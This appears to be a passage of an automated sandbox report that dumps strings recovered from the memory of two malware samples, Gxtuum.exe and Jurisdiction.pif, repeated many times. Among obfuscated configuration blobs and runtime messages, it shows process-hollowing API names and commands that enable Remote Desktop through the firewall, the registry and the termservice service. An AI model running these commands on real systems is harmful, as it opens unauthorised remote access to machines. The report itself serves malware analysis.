Source: Gxtuum.exe, 0000000A.00000002.2753574445.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Gxtuum.exe, 0000000A.00000000.2751360850.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 0000000A.00000000.2751360850.0000000000231000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd122f964d1224a00cff1eef50e53e28607c6bc37dc50874878dcb010336ed9061b6eb278ac18116a6aa0b8e6b8858603044624PJ8SQhDqQIVoFTBjOE3=OQIcgR9kYxLm4WU 12lkgKmqQIVnSy==XoRcgFPmMISjiO==OIMjiO==P E9RBbYPcMdHA==UT9RiVQmOcMVSQ==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmXT2e2G==XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA40VIef9sK4GKhdHGwf6CeO1DrXTI9hlMUfq==XcMk1SSbNA4wLvAEKEaHKHdpP7JaXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7JrPmfdMl4EslPpz8XxAm41EaeND=XQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTE4V1QrfcMl7FOaesSff6 7G1bofx6t2NA4Z0ceewn8KmYh1L0ogA==MLMKWTEJXa0xLUmuLV==0uwnhy==Xu0K0y==UQMLdMHXgdDXfSHXeTDX1cbX1NzXfwDXgMVX2wRX1NPXexPXeS4Xf R=1TAc4A0dewoZR2meeH afKC21TAc4A0dewn=1SoghA0dewn=2tv=2Jv=2Jz=2JD=WMwgge==dxIRhBjoOm==dxIRhFHZOoZ=2N9c2woj1SSbfxDoeNEghccnOTwSfUQTSwD+SwH+ORsjiU9iedDmNojiLm==iq==MdMlfVL2SG==fS9cgErsP9Wb5Gl=dSMpgkQlPpzlSGmhUSMRYkATdNQcN3aofL0jW0 g1A==XxAm41EaeKI97Gu2TLQsZZL XS0d7H37erZ=TNQghkz=VSwqhEQrfSkWBEm70l==ULEw0y==Xwwl4Ez XSMa7XyefMp=Uw0aiE4rLv5cRg==TLQyPpPn0E4T1MoKSWCQerqQiU==TccR4EQf2MWbSXx=Wc0piE4nXS0nfE4sTS0kg0MoYSclWEQf2MWbSXx=PtvpRxLUQ 4VHQ==fcz=gSz=TS0liEQngsSL8XqaQnGjh0CU01v geNq2c0pgQWd1NI9Hyq8d80k3KKs4XUlPJXoOIRkQQVmGGgug00T2MWREUGee8Glg6qU003mS yheTAkQUMagwvYBGU7d1ZZMqWb3KyaSpyhdMocgkAm2JR L7RBV04ngwMl7CQJg2GbSmGb2LvkeNKcgwcmgg4o1TIc7CQofMOb205HrkUCGGfkQQVmOIR=OIREHe==STEahhVqOcgn4u==TS0liEQngsSL8XqaQnG8gLGm00H hxiqe90VQV9WgoSd53yiN20ofK0oN63c3NN=XRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4J2YieM0Q31OIN0Vd1vKqeNsSiEQrWcwkSQ==TS0khFQT2NAFRWQa1MAa4EQf2S9g4mihd1 lgLKs27LTheaZhNfnRRDsQtLTGz6UN0c=ONMlfUIo2wLkXRcK0CQG0uES6nyadsWtf6 U2q3kYTSV0uEmglMreSo4OWUefL0aZqqeO035UR6JYvAGYDsPVKIwM1l=XRcK0CQG0uEm5nGnd7CJ31VqBHz5YTStgcca4VI6Tcwq4WCtc2SmfKKZMJTh3xSqYccb4U4CUq==0trnRBv=UwMd3VQlgvEc7HGedripPpmMO1HnfySVdM0lUwMd3VQlgvEc7HGedripPpqMO1HnfySVdM0lXQ0x0D9uXaM4MWa9erdpf64UMJ8hfdOqgTD8YjM6TTMp6mKjfK4bgrSj16Y=XxAm4FQcguW95WJ=P roTO==P rpRe==P roSe==P rpSO==TTMphkQnguAS4Wm 0q==R fXfdMl4EslPpzlSX7aOSj8LdI9h0okdMojBCYbKHdffWFcL9rdOgwTdMSc53KPKIJ7Nm3aOKPkMr==M9P8WVcigsz=L9rdOgwr2MV8LsPdNy==Xw0U4VEsdwMj5CUagLZ=OMMV4UIUgwcm5nqkdLq iWGsO0VnhxSudM5l4UL OKQg5GJ6Kl==L7==fS9SiEMogSV8EXB6N2V7QE==fTH0hu==fcwl4E4mVSMW3k4afcH8MGuUd80Q1JGsO0rn2NN=PtrnRBvTPJb=PtrnRBvTP z=PtrnRBvTP D=PtrnRBvTPSP=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Jurisdiction.pif, 00000015.00000002.4852242929.0000000003C90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Jurisdiction.pif, 00000015.00000002.4791474737.0000000000061000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Jurisdiction.pif, 00000015.00000002.4791474737.0000000000061000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Jurisdiction.pif, 00000015.00000002.4841930121.0000000001918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Jurisdiction.pif, 00000015.00000002.4841930121.0000000001918000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0BdTgNhFTYphbRl3zPi2fHpd37=SEysZCRo3u89gLQ=KgpuOL==KgpvMb==KgpuNb==KgpvNL==O0KvchRz3uMSfLtbVx==Mgd3akKrZBtxBpLl4MdcJZhdGkGecXpw0MAjNr5dxwZm1KuiGfpjJdx50M4cgSRRxxudyaSg1HYwEu==HfNdRSdu3sL=GfpjJdxDOM78GzNjIv==SDY0ZSFE0wYjgr1c4AK=JTK1ZRJ63womgcxm1Abg4Kvy1X4z AMp9T3rZRMlAK2ggvQ8xa==Gd==aZ7YdBNA3S78QMI8ARGdBs==a0F6cr==ajurZB5yQZK2Yh5m2cT8YvBW1XLXMxvy1XAzUQH=KAptMyw5BJn=KAptMyw5B L=KAptMyw5B P=KAptMyw5BS1=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: Jurisdiction.pif, 00000015.00000002.4839083087.0000000001850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: Jurisdiction.pif, 00000015.00000002.4839083087.0000000001850000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set9808a67f01d2f0720518035acbde7521c1ec479e5342a25940592acf24703eb27c43933a6df6cc301ccfdb96c295ca9e1379cdKQ6YLeECCI7oRIIlBdu0JXCschRUJvTmfL1bOR7r2ybwLPTtMr==SvPibCQyHPQpdL==JPKpdL==XgagNuVoBJ1TRp==WZYvZSx5AcYV4F==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyPWW XN==SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy VSJq29EKfvRj1wrD1Urk1YMDS0GeciN62q==SjKqWZQhIx5IxvMEWthJxwZwAVygSXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcWoYyakKrZBtxBpL8SEysZYFm1NP=SXYDVA GJaY4YLha2gZw1UT0ZGgt8gIlb0C QYRD2cYliuVc2hDm1UZcTYkA8A0oXUy UXdq1wz8Wb5jOALv2o==HSKQRQFVJabxXJtwyK==VButcv==SBYQVv==PXKR9TF3bkB3aZF3 0B3Wj 3WUx3aDB3bTT3XDP3WUN3 EN3 Z23agP=W0yiZx1p1wAZ3Rtg2wVh1yr8W0yiZx1p1wz=WZmmcx1p1wz=XAt=XQt=XQx=XQB=RTumbb==9EGXcykAAm==9EGXcCIaAoa=XU7iXDmpWZQhaEBu UCmcjatJ0uYaRR5NDB+NDF+JYqpdR u1dPmIvhoGt==dx==HkKraSMdNN==aZ7ibBsEB98bgvs=9ZKvbhRxBpLl4vtjPZKXThB50N2cZShq3ALqHOZmdx==SEysZYFm1KU9ivB4OSOyUWMlJSbdiw 92gK=OUOmchA=QZuwcBRD2SwWNtt9Na==PSCCVv==SDurZBAlJSYaiMFg3Ba=PDYgdB5Dxvgc36==OSOEKwNtVB55NMAK4LJS2gbX4I==OjaXZBRrOM8b4ME=RjYvdB5zSZYtaB5EOZYqbXNATZarRBRrOM8b4ME=KAtvMuM6C fVTF==ajx=bZx=OZYrdBRz3s4LjMxcDcrq3Or0cYEl9hHlXjYvbNXpNNU9Tnx 1XLrOyzygU3xHMRjJPPqLNWyBNeAbX15OM8RQJNg2Xrs2Uf0cXbyKcsc 0yqLRNm3wHYNv191QK6xeLhfHHmKssc9TmibhByOJ3 GdPHQX5z3wYlirXL4RriDavheIEw7QE8bDasbd5ANTUcirXq3BziNOUNEh3OBNdqLNWyAI3=JPPKCb==N0CgceWCJjetZr==OZYrdBRz3s4LjMxcDcre2zvscXQl Acl fY1LS 83o4dgSFkARLv1yPu03boVQH=SYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA4VR5k2BLXOPDO0X4pTyEl UqYdBRDIcIk4F==OZYqcCR5ONMF3LXcWTygZBRrOSkgfbpj1QVs2zzye4U5 h5UcUdtMOEECtXTSocWAPY=JUKraRJAOwXkSYaQVzRSMuQShcFc1hHA1UZ0enbwQWMQVBCsbiND1SA40L1g3ALhKefk1XbgMU0ETCyMTAt1HKUwYQs=SYaQVzRSMuQmgcNp1WnQOPKwOEIgQWMobjagZSJhFcIqfLJv0RDt1yz5ZG2tVAMlTjahZR5OGq==VAptMyw=PDKjYSRx3vQciwNg1g4wAdbS1YQz8BMQ9TYrPDKjYSRx3vQciwNg1g4wAdfS1YQz8BMQ9TYrSXYDVA 